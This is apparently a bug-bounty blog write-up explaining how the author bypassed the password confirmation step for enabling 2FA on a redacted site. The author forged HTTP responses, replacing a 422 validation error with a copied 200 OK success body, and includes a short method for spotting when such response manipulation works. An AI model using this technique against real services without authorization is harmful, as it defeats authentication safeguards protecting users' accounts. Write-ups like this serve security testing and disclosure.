BOOK THIS SPACE FOR AD
ARTICLE ADWhen enabling 2FA(write-up soon on how I was able to bypass it), it asked for password confirmation, then I thought why not give a try to the so-called Response Manipulation.
The Workflow
Now, how to test for it? The matter here is quite simple: you understand if it is possible to use response manipulation and then try to exploit it. But how do I know it is possible? When used to bypass auth, in my point of view, to understand when is it possible you have to see if the endpoint you want to bypass is triggering another action before completing the process, or if it completes just after the auth form. For example, if you want to bypass OTP, after entering the right code, does it say: “Ok you have completed the OTP process, now login”. Or is it asking you for a password or your sex? (for example). If you get the first, then response manipulation to bypass OTP won’t work, but in case you get the second situation, then it might be possible. Now after this, there is another step you have to check before trying response manipulation: after entering the password or sex, is the code(or anything you wanted to bypass) still there in the response body? For example, if you get this after clicking(for example) the male Button when asking your sex:
otp=1111&other_data=other_datathen it is not possible, but if you only get:
other_data=other_datathen it can be possible to bypass the top code using response manipulation.
This one I found
Now you have enough knowledge on response manipulation to understand what is going on in the next paragraph.
When enabling 2FA, it asked first for a password confirmation(you already know that :D). Then after entering the right password the response looked like this:
HTTP/1.1 200 OKDate: Tue, 28 Jul 2020 11:30:14 GMT
Content-Type: application/json
Connection: close
Set-Cookie: __cfduid=somecookie; expires=Thu, 27-Aug-20 11:30:14 GMT; path=/; domain=*.redacted.com; HttpOnly; SameSite=Lax; Secure
Cache-Control: no-cache, private
X-RateLimit-Limit: 100
X-RateLimit-Remaining: 99
Z-Redacted-Password-Auth-Valid-Until: 1595935589
Strict-Transport-Security: max-age=31536000; includeSubDomains
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
Content-Length: 480
{"data":{"type":"createtwofa","attributes":{"secret":"code","qr":"someurl","qr_url":"anotherurl"},"id":"a code(not the password it asked)"},"last_user_action":{"date_iso8601":"2020-07-28T13:30:14+02:00","unix":"1595935814"}}
After this, it returned the value and the QR code. I scanned it using google-authenticator and clicked next, it asked for the authenticator code, and then confirmed 2fa was enabled. Everything was OK to try bypassing the password restriction using response manipulation.
So I disabled 2fa and tried to enable it when it asked for the password confirmation, it entered a wrong one and got this as a response:
HTTP/1.1 422 Unprocessable EntityDate: Tue, 28 Jul 2020 11:41:27 GMT
Content-Type: application/json
Content-Length: 177
Connection: close
Set-Cookie: __cfduid=somecookie; expires=Thu, 27-Aug-20 11:41:26 GMT; path=/; domain=redacted.com; HttpOnly; SameSite=Lax; Secure
Cache-Control: no-cache, private
Access-Control-Allow-Headers: origin, content-type, access-token, x-tracking-id
Access-Control-Allow-Origin: *
X-RateLimit-Limit: 100
X-RateLimit-Remaining: 99
X-BRedacted-Password-Auth-Valid-Until: 1595935589
Strict-Transport-Security: max-age=31536000; includeSubDomains
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
{"errors":[{"status":422,"code":"user.validation.exception","title":"Validation exception"}],"last_user_action":{"date_iso8601":"2020-07-28T13:41:27+02:00","unix":"1595936487"}}
I then changed it to this:
HTTP/1.1 200 OKDate: Tue, 28 Jul 2020 11:30:14 GMT
Content-Type: application/json
Connection: close
Set-Cookie: __cfduid=somecookie; expires=Thu, 27-Aug-20 11:30:14 GMT; path=/; domain=*.redacted.com; HttpOnly; SameSite=Lax; Secure
Cache-Control: no-cache, private
X-RateLimit-Limit: 100
X-RateLimit-Remaining: 99
Z-Redacted-Password-Auth-Valid-Until: 1595935589
Strict-Transport-Security: max-age=31536000; includeSubDomains
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
Content-Length: 480
{"data":{"type":"createtwofa","attributes":{"secret":"code","qr":"someurl","qr_url":"anotherurl"},"id":"a code(not the password it asked)"},"last_user_action":{"date_iso8601":"2020-07-28T13:30:14+02:00","unix":"1595935814"}}
Forwarded and followed the process, 2fa was enabled without requiring a valid password. “Secure web app design principles” bypassed.